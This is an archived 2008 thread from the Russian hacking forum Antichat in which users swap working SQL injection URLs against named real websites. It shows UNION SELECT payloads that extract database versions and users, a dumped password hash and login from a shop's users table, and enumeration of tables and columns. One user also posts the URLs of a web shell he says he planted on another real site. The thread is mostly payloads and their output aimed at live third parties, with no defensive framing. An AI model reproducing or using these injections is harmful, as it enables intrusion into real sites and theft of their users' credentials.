ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.02.2008, 14:30
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994
Репутация:
237
|
|
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/haute/domains/hauteecole.ru/public_html/shop/template/header.php on line 60
Мальчики, неужели вы обьявите мне игнор?  тут:
http://shop.hauteecole.ru/news.php?id=1'
Пыталась запросы вида:
http://shop.hauteecole.ru/news.php?id=1'+select+union+1,2,3,4,5,6/*
Или так, хотя один ли фиг:
http://shop.hauteecole.ru/news.php?id=1'%20select%20union%201,2,3,4,5,6/*
Мальчики, скажите мне, блондинке, как заставить этот долбаный мускуль выдать хоть какие-то результаты? Тупо подбирать столбцы, или надо извращаться?
Последний раз редактировалось Digital Cat; 03.03.2008 в 19:28..
|
|
|
14.02.2008, 14:31
|
|
Познающий
Регистрация: 23.11.2006
Сообщений: 79
Провел на форуме:
1044181
Репутация:
66
|
|
Залил шел на www.miheeff.ru мож кому надо, у него и подсайтов многа.
http://dvd.miheeff.ru/aaadmin.php
http://sms.miheeff.ru/sms_en.php
http://miheeff.ru/php.php
|
|
|
|
14.02.2008, 14:51
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.dedefensa.org/choix.php?comm=1&link_id=99999+union+select+1,2,3,4,5,6,7,8,9/*
dedefensa@localhost:dedefensa:5.0.45 |
|
|
|
14.02.2008, 15:36
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
2 Digital Cat
Не плачь =)
Код HTML:
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
5.0.22:haute_shop@localhost:haute_shop
Последний раз редактировалось ~EviL~; 14.02.2008 в 15:39..
|
|
|
|
14.02.2008, 15:52
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994
Репутация:
237
|
|
О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
 |
|
|
|
14.02.2008, 16:48
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Сообщение от Digital Cat
О_о 1? И это все?)) Нда... Несерьезно))
Спасибо!
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat(password,char(58),login,cha r(58),id)+from+users/*
fe83361168623c81f8a8f11a8270ef7b:Liliya1976:2
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+concat_ws(0x3A,table_schema,TABLE_ NAME)+FROM+INFORMATION_SCHEMA.TABLES+limit%2028,13/*
Таблы
CHARAKTER SETS, collations, COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS about basket catalog delivery finance news orders pages params payment structure typegoods users
http://shop.hauteecole.ru/news.php?id=-1)+UNION+SELECT+column_name+from+information_schem a.columns%20limit%204,1/*
колонки
CHARACTER_SET_NAME DEFAULT_COLLATE_NAME DESCRIPTION MAXLEN COLLATION_NAME
NO COMENTS IN MY POST
Последний раз редактировалось kair; 14.02.2008 в 16:51..
|
|
|
|
14.02.2008, 17:03
|
|
Новичок
Регистрация: 23.01.2008
Сообщений: 15
Провел на форуме:
20588
Репутация:
63
|
|
http://www.superherohype.com/news/300news.php?id=-4610+union+select+concat_ws(0x3a,version(),user(), database())/*
Смотрим в заголовок, где и выводится инфа  ЫЫЫЫЫ 
Суперхер... |
|
|
|
14.02.2008, 17:04
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
Сообщение от ThreeD
2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..
нафиг мне смотереть кучу однообразных инъекций?
просто я решил объяснить челу про information.schema а он оказывается уже знает...
|
|
|
|
14.02.2008, 17:25
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Скуль я выкладывал раньше, потом я ее удалил...и естественно я не смотрел на предыдущую страничку.. Чуваку нашедшему и раскрывшему до конца скуль респект и уважуха! в отличе от меня ему было не лень найти логины и пасы на админку
Последний раз редактировалось xcedz; 14.02.2008 в 17:28..
|
|
|
|
14.02.2008, 18:05
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.doktor-al.ru/get_news.php?news_id=99999+union+select+1,2,3,4,5,6,7/*
doctor_al_ru@localhost:doctor_al_ru:5.0.24a
Код:
http://www.daoctemplates.net/viewUser.php?UserID=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,username,password,email),29,30,31,32,33+from+users/*
daoctemplates@localhost:daoctemplates:4.1.20 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
